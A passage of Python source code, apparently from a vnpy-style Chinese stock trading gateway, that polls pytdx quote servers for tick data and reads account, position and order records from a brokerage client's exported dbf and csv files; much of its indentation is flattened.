self.pool = None
self.api_dict = {}
            pool_count = getattr(self.gateway, 'tdx_pool_count', 3)
            self.connect(pool_count)
# self.gateway.write_log(u'tdx接口状态正常')
def qry_instrument(self, symbol):
"""
查询/更新股票信息
:return:
"""
if not self.connection_status:
return
api = self.api_dict.get(0)
if api is None:
self.gateway.write_log(u'取不到api连接,更新合约信息失败')
return
# TODO: 取得股票的中文名
market_code = get_tdx_market_code(symbol)
api.to_df(api.get_finance_info(market_code, symbol))
# 如果有预定的订阅合约,提前订阅
# if len(all_contacts) > 0:
# cur_folder = os.path.dirname(__file__)
# export_file = os.path.join(cur_folder,'contracts.csv')
# if not os.path.exists(export_file):
# df = pd.DataFrame(all_contacts)
# df.to_csv(export_file)
def cov_contracts(self):
"""转换本地缓存=》合约信息推送"""
for symbol_marketid, info in self.symbol_dict.items():
symbol, market_id = symbol_marketid.split('_')
exchange = info.get('exchange', '')
if len(exchange) == 0:
continue
vn_exchange_str = get_stock_exchange(symbol)
if exchange != vn_exchange_str:
continue
exchange = Exchange(exchange)
if info['stock_type'] == 'stock_cn':
product = Product.EQUITY
elif info['stock_type'] in ['bond_cn', 'cb_cn']:
product = Product.BOND
elif info['stock_type'] == 'index_cn':
product = Product.INDEX
elif info['stock_type'] == 'etf_cn':
product = Product.ETF
else:
product = Product.EQUITY
volume_tick = info['volunit']
if symbol.startswith('688'):
volume_tick = 200
contract = ContractData(
gateway_name=self.gateway_name,
symbol=symbol,
exchange=exchange,
name=info['name'],
product=product,
pricetick=round(0.1 ** info['decimal_point'], info['decimal_point']),
size=1,
min_volume=volume_tick,
margin_rate=1
)
if product != Product.INDEX:
# 缓存 合约 =》 中文名
symbol_name_map.update({contract.symbol: contract.name})
                # 缓存代码和交易所的映射关系
symbol_exchange_map[contract.symbol] = contract.exchange
self.contract_dict.update({contract.symbol: contract})
self.contract_dict.update({contract.vt_symbol: contract})
# 推送
self.gateway.on_contract(contract)
def get_stock_list(self):
"""股票所有的code&name列表"""
api = self.api_dict.get(0)
if api is None:
self.gateway.write_log(u'取不到api连接,更新合约信息失败')
return None
self.gateway.write_log(f'查询所有的股票信息')
data = pd.concat(
[pd.concat([api.to_df(api.get_security_list(j, i * 1000)).assign(sse='sz' if j == 0 else 'sh').set_index(
['code', 'sse'], drop=False) for i in range(int(api.get_security_count(j) / 1000) + 1)], axis=0) for j
in range(2)], axis=0)
sz = data.query('sse=="sz"')
sh = data.query('sse=="sh"')
sz = sz.assign(sec=sz.code.apply(get_stock_type_sz))
sh = sh.assign(sec=sh.code.apply(get_stock_type_sh))
temp_df = pd.concat([sz, sh]).query('sec in ["stock_cn","etf_cn","bond_cn","cb_cn"]').sort_index().assign(
name=data['name'].apply(lambda x: str(x)[0:6]))
hq_codelist = temp_df.loc[:, ['code', 'name']].set_index(['code'], drop=False)
for i in range(0, len(temp_df)):
row = temp_df.iloc[i]
if row['sec'] == 'etf_cn':
product = Product.ETF
elif row['sec'] in ['bond_cn', 'cb_cn']:
product = Product.BOND
else:
product = Product.EQUITY
volume_tick = 100 if product != Product.BOND else 10
if row['code'].startswith('688'):
volume_tick = 200
contract = ContractData(
gateway_name=self.gateway_name,
symbol=row['code'],
exchange=Exchange.SSE if row['sse'] == 'sh' else Exchange.SZSE,
name=row['name'],
product=product,
pricetick=round(0.1 ** row['decimal_point'], row['decimal_point']),
size=1,
min_volume=volume_tick,
margin_rate=1
)
# 缓存 合约 =》 中文名
symbol_name_map.update({contract.symbol: contract.name})
            # 缓存代码和交易所的映射关系
symbol_exchange_map[contract.symbol] = contract.exchange
self.contract_dict.update({contract.symbol: contract})
self.contract_dict.update({contract.vt_symbol: contract})
# 推送
self.gateway.on_contract(contract)
return hq_codelist
def run(self, i):
"""
        版本1:Pool内的线程,持续运行,每个线程从queue中获取一个请求并处理
        版本2:Pool内的线程,从订阅合约集合中,取出下标 % api_count == i 的合约,并发送请求
:param i:
:return:
"""
# 版本2:
try:
api_count = len(self.api_dict)
last_dt = datetime.now()
self.gateway.write_log(u'开始运行tdx[{}],{}'.format(i, last_dt))
while self.connection_status:
symbols = set()
for idx, tdx_symbol in enumerate(list(self.registed_symbol_set)):
# self.gateway.write_log(u'tdx[{}], api_count:{}, idx:{}, tdx_symbol:{}'.format(i, api_count, idx, tdx_symbol))
if idx % api_count == i:
try:
symbols.add(tdx_symbol)
self.processReq(tdx_symbol, i)
except BrokenPipeError as bex:
self.gateway.write_error(u'BrokenPipeError{},重试重连tdx[{}]'.format(str(bex), i))
self.reconnect(i)
sleep(5)
break
except Exception as ex:
self.gateway.write_error(
u'tdx[{}] exception:{},{}'.format(i, str(ex), traceback.format_exc()))
# api = self.api_dict.get(i,None)
# if api is None or getattr(api,'client') is None:
self.gateway.write_error(u'重试重连tdx[{}]'.format(i))
print(u'重试重连tdx[{}]'.format(i), file=sys.stderr)
self.reconnect(i)
# self.gateway.write_log(u'tdx[{}] sleep'.format(i))
sleep(self.req_interval)
dt = datetime.now()
if last_dt.minute != dt.minute:
self.gateway.write_log('tdx[{}] check point. {}, process symbols:{}'.format(i, dt, symbols))
last_dt = dt
except Exception as ex:
self.gateway.write_error(u'tdx[{}] pool.run exception:{},{}'.format(i, str(ex), traceback.format_exc()))
self.gateway.write_error(u'tdx[{}] {}退出'.format(i, datetime.now()))
def processReq(self, req, i):
"""
处理行情信息ticker请求
:param req:
:param i:
:return:
"""
symbol = req
if '.' in symbol:
symbol, exchange = symbol.split('.')
if exchange == 'SZSE':
market_code = 0
else:
market_code = 1
else:
market_code = get_tdx_market_code(symbol)
exchange = get_stock_exchange(symbol)
exchange = Exchange(exchange)
api = self.api_dict.get(i, None)
if api is None:
self.gateway.write_log(u'tdx[{}] Api is None'.format(i))
raise Exception(u'tdx[{}] Api is None'.format(i))
symbol_config = self.symbol_dict.get('{}_{}'.format(symbol, market_code), {})
decimal_point = symbol_config.get('decimal_point', 2)
# self.gateway.write_log(u'tdx[{}] get_instrument_quote:({},{})'.format(i,self.symbol_market_dict.get(symbol),symbol))
rt_list = api.get_security_quotes([(market_code, symbol)])
if rt_list is None or len(rt_list) == 0:
self.gateway.write_log(u'tdx[{}]: rt_list为空'.format(i))
return
# else:
# self.gateway.write_log(u'tdx[{}]: rt_list数据:{}'.format(i, rt_list))
if i in self.last_tick_dt:
self.last_tick_dt[i] = datetime.now()
# <class 'list'>: [OrderedDict([
# ('market', 0),
# ('code', '000001'),
# ('active1', 1385),
# ('price', 13.79),
# ('last_close', 13.69),
# ('open', 13.65), ('high', 13.81), ('low', 13.56),
# ('reversed_bytes0', 10449822), ('reversed_bytes1', -1379),
# ('vol', 193996), ('cur_vol', 96),
# ('amount', 264540864.0),
# ('s_vol', 101450),
# ('b_vol', 92546),
# ('reversed_bytes2', 0), ('reversed_bytes3', 17185),
# ('bid1', 13.79), ('ask1', 13.8), ('bid_vol1', 877), ('ask_vol1', 196),
# ('bid2', 13.78), ('ask2', 13.81), ('bid_vol2', 2586), ('ask_vol2', 1115),
# ('bid3', 13.77), ('ask3', 13.82), ('bid_vol3', 1562), ('ask_vol3', 807),
# ('bid4', 13.76), ('ask4', 13.83), ('bid_vol4', 211), ('ask_vol4', 711),
# ('bid5', 13.75), ('ask5', 13.84), ('bid_vol5', 1931), ('ask_vol5', 1084),
# ('reversed_bytes4', (385,)), ('reversed_bytes5', 1), ('reversed_bytes6', -41), ('reversed_bytes7', -29), ('reversed_bytes8', 1), ('reversed_bytes9', 0.88),
# ('active2', 1385)])]
dt = datetime.now()
for d in list(rt_list):
# 忽略成交量为0的无效单合约tick数据
if d.get('cur_vol', 0) <= 0:
# self.gateway.write_log(u'忽略成交量为0的无效单合约tick数据:')
continue
code = d.get('code', None)
if symbol != code and code is not None:
self.gateway.write_log(u'忽略合约{} {} 不一致的tick数据:{}'.format(symbol, d.get('code'), rt_list))
continue
tick = TickData(
gateway_name=self.gateway_name,
symbol=symbol,
exchange=exchange,
datetime=dt,
date=dt.strftime('%Y-%m-%d'),
time=dt.strftime('%H:%M:%S')
)
if decimal_point > 2:
tick.pre_close = round(d.get('last_close') / (10 ** (decimal_point - 2)), decimal_point)
tick.high_price = round(d.get('high') / (10 ** (decimal_point - 2)), decimal_point)
tick.open_price = round(d.get('open') / (10 ** (decimal_point - 2)), decimal_point)
tick.low_price = round(d.get('low') / (10 ** (decimal_point - 2)), decimal_point)
tick.last_price = round(d.get('price') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_price_1 = round(d.get('bid1') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_1 = d.get('bid_vol1')
tick.ask_price_1 = round(d.get('ask1') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_1 = d.get('ask_vol1')
if d.get('bid5'):
tick.bid_price_2 = round(d.get('bid2') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_2 = d.get('bid_vol2')
tick.ask_price_2 = round(d.get('ask2') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_2 = d.get('ask_vol2')
tick.bid_price_3 = round(d.get('bid3') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_3 = d.get('bid_vol3')
tick.ask_price_3 = round(d.get('ask3') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_3 = d.get('ask_vol3')
tick.bid_price_4 = round(d.get('bid4') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_4 = d.get('bid_vol4')
tick.ask_price_4 = round(d.get('ask4') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_4 = d.get('ask_vol4')
tick.bid_price_5 = round(d.get('bid5') / (10 ** (decimal_point - 2)), decimal_point)
tick.bid_volume_5 = d.get('bid_vol5')
tick.ask_price_5 = round(d.get('ask5') / (10 ** (decimal_point - 2)), decimal_point)
tick.ask_volume_5 = d.get('ask_vol5')
else:
tick.pre_close = d.get('last_close')
tick.high_price = d.get('high')
tick.open_price = d.get('open')
tick.low_price = d.get('low')
tick.last_price = d.get('price')
tick.bid_price_1 = d.get('bid1')
tick.bid_volume_1 = d.get('bid_vol1')
tick.ask_price_1 = d.get('ask1')
tick.ask_volume_1 = d.get('ask_vol1')
if d.get('bid5'):
tick.bid_price_2 = d.get('bid2')
tick.bid_volume_2 = d.get('bid_vol2')
tick.ask_price_2 = d.get('ask2')
tick.ask_volume_2 = d.get('ask_vol2')
tick.bid_price_3 = d.get('bid3')
tick.bid_volume_3 = d.get('bid_vol3')
tick.ask_price_3 = d.get('ask3')
tick.ask_volume_3 = d.get('ask_vol3')
tick.bid_price_4 = d.get('bid4')
tick.bid_volume_4 = d.get('bid_vol4')
tick.ask_price_4 = d.get('ask4')
tick.ask_volume_4 = d.get('ask_vol4')
tick.bid_price_5 = d.get('bid5')
tick.bid_volume_5 = d.get('bid_vol5')
tick.ask_price_5 = d.get('ask5')
tick.ask_volume_5 = d.get('ask_vol5')
tick.volume = d.get('vol', 0)
tick.open_interest = d.get('amount', 0)
# 修正毫秒
last_tick = self.symbol_tick_dict.get(symbol, None)
if (last_tick is not None) and tick.datetime.replace(microsecond=0) == last_tick.datetime:
# 与上一个tick的时间(去除毫秒后)相同,修改为500毫秒
tick.datetime = tick.datetime.replace(microsecond=500)
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
else:
tick.datetime = tick.datetime.replace(microsecond=0)
tick.time = tick.datetime.strftime('%H:%M:%S.%f')[0:12]
tick.date = tick.datetime.strftime('%Y-%m-%d')
tick.trading_day = tick.datetime.strftime('%Y-%m-%d')
# 指数没有涨停和跌停,就用昨日收盘价正负10%
tick.limit_up = tick.pre_close * 1.1
tick.limit_down = tick.pre_close * 0.9
            # 排除非交易时间的tick
if tick.datetime.hour not in [9, 10, 11, 13, 14, 15]:
return
elif tick.datetime.hour == 9 and tick.datetime.minute <= 25:
return
elif tick.datetime.hour == 15 and tick.datetime.minute >= 0:
return
self.symbol_tick_dict[symbol] = tick
self.gateway.on_tick(tick)
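# Standalone, hedged sketch of the pytdx calls PbMdApi relies on. The host below is just one of
# the candidate addresses in ip_list and may be unreachable; treat both host and symbol as
# example values only.
def _demo_tdx_quote(symbol: str = '600000'):
    api = TdxHq_API()
    market_code = get_tdx_market_code(symbol)  # 0 = SZSE, 1 = SSE
    with api.connect('180.153.18.170', 7709):
        quotes = api.get_security_quotes([(market_code, symbol)])
    return quotes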
class PbTdApi(object):
def __init__(self, gateway: PbGateway):
""""""
super().__init__()
self._active = False
self.gateway: PbGateway = gateway
self.gateway_name: str = gateway.gateway_name
self.userid: str = "" # 资金账号
self.product_id: str = "" # 产品编号(在pb客户端看到)
self.unit_id: str = "1" # 单元编号(在pb客户端设置),缺省是1
self.holder_ids = {}
self.order_folder = "" # 埋单csv文件所在目录
self.account_folder = "" # 账号导出csv所在目录
# 缓存了当前交易日
self.trading_day = datetime.now().strftime('%Y-%m-%d')
self.trading_date = self.trading_day.replace('-', '')
self.connect_status: bool = False
self.login_status: bool = False
# 所有交易
self.trades = {} # tradeid: trade
# 本gateway以外的委托
self.orders = {} # sys_orderid: order
# 未获取本地更新检查的orderid清单
self.unchecked_orderids = []
def close(self):
pass
def connect(self, user_id, order_folder, account_folder, product_id, unit_id="1", holder_ids={}):
"""连接"""
self.userid = user_id
self.order_folder = order_folder
self.product_id = product_id
self.unit_id = unit_id
self.holder_ids = holder_ids
if os.path.exists(self.order_folder):
self.connect_status = True
self.account_folder = account_folder
if os.path.exists(self.account_folder):
self.login_status = True
# 仅查询一次
self.query_trades()
# 仅全局查询一次
self.query_orders()
# 首次连接时,优先全部撤单
self.cancel_all()
if self.gateway.file_type == 'dbf':
self.gateway.query_functions.append(self.query_update_trades_dbf)
self.gateway.query_functions.append(self.query_update_orders_dbf)
def get_data(self, file_path, field_names=None):
"""获取文件内容"""
if not os.path.exists(file_path):
return None
results = []
try:
with open(file=file_path, mode='r', encoding='gbk', ) as f:
reader = csv.DictReader(f=f, fieldnames=field_names, delimiter=",")
for row in reader:
results.append(row)
except Exception as ex:
self.gateway.write_error(f'读取csv文件数据异常:{str(ex)}')
return results
def query_account(self):
if self.gateway.file_type == 'dbf':
self.query_account_dbf()
else:
self.query_account_csv()
def query_account_dbf(self):
"""获取资金账号信息"""
# dbf 文件名
account_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('accounts'),
self.trading_date)))
try:
# dbf => 资金帐号信息
self.gateway.write_log(f'扫描资金帐号信息:{account_dbf}')
table = dbf.Table(account_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
# ["资金账户"]
if str(data.zjzh).strip() != self.userid:
continue
account = AccountData(
gateway_name=self.gateway_name,
accountid=self.userid,
balance=float(data.dyjz), # ["单元净值"]
frozen=float(data.dyjz) - float(data.kyye), # data["可用余额"]
currency="人民币",
trading_day=self.trading_day
)
self.gateway.on_account(account)
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描资金帐号异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_account_csv(self):
"""获取资金账号信息"""
if self.gateway.pb_version == '2018':
# 账号的文件
accounts_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('accounts'),
self.trading_date)))
else:
# 账号的文件
accounts_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('accounts'),
self.trading_date)))
# csv => 所有账号资金清单
account_list = self.get_data(accounts_csv)
if not account_list:
return
for data in account_list:
if data["资金账户"] != self.userid:
continue
account = AccountData(
gateway_name=self.gateway_name,
accountid=self.userid,
balance=float(data["单元净值"]),
frozen=float(data["单元净值"]) - float(data["可用余额"]),
currency="人民币",
trading_day=self.trading_day
)
self.gateway.on_account(account)
def query_position(self):
"""获取持仓信息"""
if self.gateway.file_type == 'dbf':
self.query_position_dbf()
else:
self.query_position_csv()
def query_position_dbf(self):
"""从dbf文件获取持仓信息"""
# fields:['zqgs', 'zjzh', 'zhlx', 'zqdm', 'zqmc', 'zqlb', 'zxjg', 'cbjg', 'cpbh', 'cpmc', 'dybh', 'dymc', 'ccsl', 'dqcb', 'kysl', 'jjsz', 'qjsz', 'zqlx'
# , 'jysc', 'jybz', 'dryk', 'ljyk', 'fdyk', 'fyl', 'ykl', 'tzlx', 'gddm', 'mrsl', 'mcsl', 'mrje', 'mcje', 'zdf', 'bbj', 'qjcb', 'gtcb', 'gtyk', 'zgb']
# dbf 文件名
position_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('positions'),
self.trading_date)))
try:
# dbf => 股票持仓信息
self.gateway.write_log(f'扫描股票持仓信息:{position_dbf}')
table = dbf.Table(position_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
if str(data.zjzh).strip() != self.userid:
continue
symbol = str(data.zqdm).strip() #["证券代码"]
# symbol => Exchange
exchange = symbol_exchange_map.get(symbol, None)
if not exchange:
exchange_str = get_stock_exchange(code=symbol)
if len(exchange_str) > 0:
exchange = Exchange(exchange_str)
symbol_exchange_map.update({symbol: exchange})
name = symbol_name_map.get(symbol, None)
if not name:
name = data.zqmc # ["证券名称"]
symbol_name_map.update({symbol: name})
position = PositionData(
gateway_name=self.gateway_name,
accountid=self.userid,
symbol=symbol, #["证券代码"],
exchange=exchange,
direction=Direction.NET,
name=name,
volume=int(data.ccsl), # ["持仓数量"]
yd_volume=int(data.kysl),# ["可用数量"]
price=float(data.cbjg), # ["成本价"]
cur_price=float(data.zxjg), # ["最新价"]
pnl=float(data.fdyk), # ["浮动盈亏"]
holder_id=str(data.gddm).strip() #["股东"]
)
self.gateway.on_position(position)
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描股票持仓异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_position_csv(self):
"""从csv获取持仓信息"""
if self.gateway.pb_version == '2018':
# 持仓的文件
positions_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('positions'),
self.trading_date)))
else:
# 持仓的文件
positions_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('positions'),
self.trading_date)))
# csv => 所有持仓清单
position_list = self.get_data(positions_csv)
if not position_list:
return
for data in position_list:
if data["资金账户"] != self.userid:
continue
symbol = data["证券代码"]
# symbol => Exchange
exchange = symbol_exchange_map.get(symbol, None)
if not exchange:
exchange_str = get_stock_exchange(code=symbol)
if len(exchange_str) > 0:
exchange = Exchange(exchange_str)
symbol_exchange_map.update({symbol: exchange})
name = symbol_name_map.get(symbol, None)
if not name:
name = data["证券名称"]
symbol_name_map.update({symbol: name})
position = PositionData(
gateway_name=self.gateway_name,
accountid=self.userid,
symbol=data["证券代码"],
exchange=exchange,
direction=Direction.NET,
name=name,
volume=int(data["持仓数量"]),
yd_volume=int(data["可用数量"]),
price=float(data["成本价"]),
cur_price=float(data["最新价"]),
pnl=float(data["浮动盈亏"]),
holder_id=data["股东"]
)
self.gateway.on_position(position)
def query_orders(self):
if self.gateway.file_type == 'dbf':
self.query_orders_dbf()
else:
self.query_orders_csv()
def query_orders_dbf(self):
"""dbf文件获取所有委托"""
# fields:['zqgs', 'zjzh', 'zhlx', 'cpbh', 'cpmc', 'dybh', 'dymc', 'wtph', 'wtxh', 'zqdm', 'zqmc', 'wtfx', 'jglx', 'wtjg', 'wtsl', 'wtzt', 'cjsl', 'wtje'
# , 'cjjj', 'cdsl', 'jysc', 'fdyy', 'wtly', 'wtrq', 'wtsj', 'jybz']
orders_dbf = os.path.abspath(os.path.join(self.account_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('orders'),
self.trading_date)))
try:
# dbf => 股票委托信息
self.gateway.write_log(f'扫描股票委托信息:{orders_dbf}')
table = dbf.Table(orders_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
if str(data.zjzh).strip() != self.userid: # ["资金账户"]
continue
sys_orderid = str(data.wtxh).strip() # ["委托序号"]
# 检查是否存在本地order_manager缓存中
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
order_date = str(data.wtrq).strip() #["委托日期"]
order_time = str(data.wtsj).strip() #["委托时间"]
order_status = STATUS_NAME2VT.get(str(data.wtzt).strip()) # ["委托状态"]
# 检查是否存在本地orders缓存中(系统级别的委托单)
sys_order = self.orders.get(sys_orderid, None)
if order is not None:
continue
# 委托单不存在本地映射库,说明是其他地方下的单子,不是通过本接口下单
if sys_order is None:
# 不处理以下状态
if order_status in [Status.SUBMITTING, Status.REJECTED, Status.CANCELLED, Status.CANCELLING]:
continue
order_dt = datetime.strptime(f'{order_date} {order_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(str(data.wtfx).strip()) # ["委托方向"]
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
sys_order = OrderData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(), # ["证券代码"]
exchange=EXCHANGE_NAME2VT.get(str(data.jysc).strip()), # ["交易市场"]
orderid=sys_orderid,
sys_orderid=sys_orderid,
accountid=self.userid,
type=ORDERTYPE_NAME2VT.get(str(data.jglx).strip(), OrderType.LIMIT), # ["价格类型"]
direction=direction,
offset=offset,
price=float(data.wtjg), # ["委托价格"]
volume=float(data.wtsl), # ["委托数量"]
traded=float(data.cjsl), # ["成交数量"]
status=order_status,
datetime=order_dt,
time=order_dt.strftime('%H:%M:%S')
)
# 直接发出订单更新事件
self.gateway.write_log(f'账号订单查询,新增:{sys_order.__dict__}')
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.on_order(sys_order)
continue
# 存在账号缓存,判断状态是否更新
else:
# 暂不处理,交给XHPT_WTCX模块处理
if sys_order.status != order_status or sys_order.traded != float(data.cjsl): # ["成交数量"]
sys_order.traded = float(data.cjsl) # ["成交数量"]
sys_order.status = order_status
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.write_log(f'账号订单查询,更新:{sys_order.__dict__}')
self.gateway.on_order(sys_order)
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf扫描股票委托异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_orders_csv(self):
"""获取所有委托"""
# 所有委托的文件
if self.gateway.pb_version == '2018':
orders_csv = os.path.abspath(os.path.join(self.account_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('orders'),
self.trading_date)))
else:
orders_csv = os.path.abspath(os.path.join(self.account_folder,
self.trading_date,
'{}{}.csv'.format(
PB_FILE_NAMES.get('orders'),
self.trading_date)))
# csv => 所有委托记录
order_list = self.get_data(orders_csv)
if not order_list:
return
for data in order_list:
if data["资金账户"] != self.userid:
continue
sys_orderid = str(data["委托序号"])
# 检查是否存在本地order_manager缓存中
order = self.gateway.order_manager.get_order_with_sys_orderid(sys_orderid)
order_date = data["委托日期"]
order_time = data["委托时间"]
order_status = STATUS_NAME2VT.get(data["委托状态"])
# 检查是否存在本地orders缓存中(系统级别的委托单)
sys_order = self.orders.get(sys_orderid, None)
if order is not None:
continue
# 委托单不存在本地映射库,说明是其他地方下的单子,不是通过本接口下单
if sys_order is None:
# 不处理以下状态
if order_status in [Status.SUBMITTING, Status.REJECTED, Status.CANCELLED, Status.CANCELLING]:
continue
order_dt = datetime.strptime(f'{order_date} {order_time}', "%Y%m%d %H%M%S")
direction = DIRECTION_STOCK_NAME2VT.get(data["委托方向"])
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
sys_order = OrderData(
gateway_name=self.gateway_name,
symbol=data["证券代码"],
exchange=EXCHANGE_NAME2VT.get(data["交易市场"]),
orderid=sys_orderid,
sys_orderid=sys_orderid,
accountid=self.userid,
type=ORDERTYPE_NAME2VT.get(data["价格类型"], OrderType.LIMIT),
direction=direction,
offset=offset,
price=float(data["委托价格"]),
volume=float(data["委托数量"]),
traded=float(data["成交数量"]),
status=order_status,
datetime=order_dt,
time=order_dt.strftime('%H:%M:%S')
)
# 直接发出订单更新事件
self.gateway.write_log(f'账号订单查询,新增:{sys_order.__dict__}')
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.on_order(sys_order)
continue
# 存在账号缓存,判断状态是否更新
else:
# 暂不处理,交给XHPT_WTCX模块处理
if sys_order.status != order_status or sys_order.traded != float(data["成交数量"]):
sys_order.traded = float(data["成交数量"])
sys_order.status = order_status
self.orders.update({sys_order.sys_orderid: sys_order})
self.gateway.write_log(f'账号订单查询,更新:{sys_order.__dict__}')
self.gateway.on_order(sys_order)
continue
def query_update_orders_dbf(self):
"""扫描批量下单的委托查询(dbf文件格式)"""
# XHPT_WTCX委托的dbf文件
orders_dbf = os.path.abspath(os.path.join(self.order_folder,
'{}{}.dbf'.format(
PB_FILE_NAMES.get('update_orders'),
self.trading_date)))
# dbf => 所有委托记录
try:
# dbf => 所有成交记录
self.gateway.write_log(f'扫描所有委托查询:{orders_dbf}')
table = dbf.Table(orders_dbf, codepage='cp936')
table.open(dbf.READ_ONLY)
for data in table:
# 第三方系统自定义号
local_orderid = str(data.wbzdyxh)
if len(local_orderid) == 0:
self.gateway.write_log(f'获取不到本地委托号:{print_dict(data.__dict__)}')
continue
# 如果不足8位,自动补充0
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
# 委托状态=>
order_status = STATUS_PB2VT.get(str(data.wtzt))
# 恒生平台返回的委托序号
sys_orderid = str(data.wtxh)
if len(sys_orderid) == 0:
self.gateway.write_log(f'获取不到恒生平台的委托序号:{print_dict(data.__dict__)}')
continue
# 通过本地委托编号,检查是否存在本地订单列表中
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
if order is None:
self.gateway.write_log(f'本地委托编号{local_orderid}不在本地订单中')
direction = DIRECTION_STOCK_NAME2VT.get(str(data.wtfx).strip())
offset = Offset.NONE
if direction is None:
direction = Direction.NET
elif direction == Direction.LONG:
offset = Offset.OPEN
elif direction == Direction.SHORT:
offset = Offset.CLOSE
if order_status == Status.ALLTRADED:
traded = data.wtsl
else:
traded = 0
order_dt = datetime.strptime(f'{data.wtrq} {data.wtsj}', "%Y%m%d %H%M%S")
exchange = EXCHANGE_PB2VT.get(str(data.jysc).strip())
new_order = OrderData(
gateway_name=self.gateway_name,
symbol=str(data.zqdm).strip(),
exchange=exchange,
orderid=local_orderid,
sys_orderid=sys_orderid,
accountid=self.userid,
type=ORDERTYPE_PB2VT.get(str(data.wtjglx).strip(), OrderType.LIMIT),
direction=direction,
offset=offset,
price=float(data.wtjg),
volume=float(data.wtsl),
traded=traded,
status=order_status,
datetime=order_dt,
time=order_dt.strftime('%H:%M:%S')
)
self.gateway.write_log(f'补充委托记录:{print_dict(new_order.__dict__)}')
self.gateway.order_manager.on_order(new_order)
continue
if order.sys_orderid != sys_orderid:
pre_sys_orderid = order.sys_orderid
order.sys_orderid = sys_orderid
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid, sys_orderid=sys_orderid)
self.gateway.write_log(
f'绑定local_orderid:{local_orderid}, <=> 系统委托号:{pre_sys_orderid}=>{sys_orderid}')
if local_orderid in self.unchecked_orderids:
self.unchecked_orderids.remove(local_orderid)
# 如果委托状态是已经撤单,拒单,已成交,就不处理
if order.status in [Status.CANCELLED, Status.REJECTED, Status.ALLTRADED]:
continue
if order.status != order_status:
self.gateway.write_log(f'{local_orderid} 状态:{order.status.value} => {order_status.value}')
order.status = order_status
if order.status == Status.CANCELLED:
order.cancel_time = datetime.now().strftime('%H:%M:%S')
if order.status == Status.ALLTRADED and order.traded != order.volume:
self.gateway.write_log(f'dbf批量下单,委托单全成交,成交数:{order.traded}=>{order.volume}')
order.traded = order.volume
self.gateway.write_log(f'dbf批量下单,委托单更新:{order.__dict__}')
self.gateway.order_manager.on_order(order)
continue
table.close()
except Exception as ex:
self.gateway.write_error(f'dbf查询委托库异常:{str(ex)}')
self.gateway.write_error(traceback.format_exc())
def query_update_orders_csv(self):
"""扫描批量下单的委托查询(csv文件格式)"""
# XHPT_WTCX委托的CSV文件
orders_csv = os.path.abspath(os.path.join(self.order_folder,
'{}{}.csv'.format(
PB_FILE_NAMES.get('update_orders'),
self.trading_date)))
# csv => 所有委托记录
order_list = self.get_data(orders_csv, field_names=UPDATE_ORDER_FIELDS.keys())
if not order_list:
return
for data in order_list:
# 第三方系统自定义号
local_orderid = str(data["WBZDYXH"]).lstrip()
if len(local_orderid) == 0:
continue
if len(local_orderid) < 8:
local_orderid = local_orderid.rjust(8, '0')
order = self.gateway.order_manager.get_order_with_local_orderid(local_orderid)
if order is None:
continue
# 恒生平台返回的委托序号
sys_orderid = str(data['WTXH']).lstrip()
if len(sys_orderid) == 0:
continue
if order.sys_orderid != sys_orderid:
pre_sys_orderid = order.sys_orderid
order.sys_orderid = sys_orderid
self.gateway.order_manager.update_orderid_map(local_orderid=local_orderid, sys_orderid=sys_orderid)
self.gateway.write_log(f'绑定local_orderid:{local_orderid}, <=> 系统委托号:{pre_sys_orderid}=>{sys_orderid}')
if local_orderid in self.unchecked_orderids:
self.unchecked_orderids.remove(local_orderid)
# 如果委托状态是已经撤单,拒单,已成交,就不处理
if order.status in [Status.CANCELLED, Status.REJECTED, Status.ALLTRADED]:
continue
order_status = STATUS_PB2VT.get(data["WTZT"])
if order.status != order_status:
self.gateway.write_log(f'{local_orderid} 状态:{order.status.value} => {order_status.value}')
order.status = order_status
if order.status == Status.CANCELLED:
order.cancel_time = datetime.now().strftime('%H:%M:%S')
if order.status == Status.ALLTRADED and order.traded != order.volume:
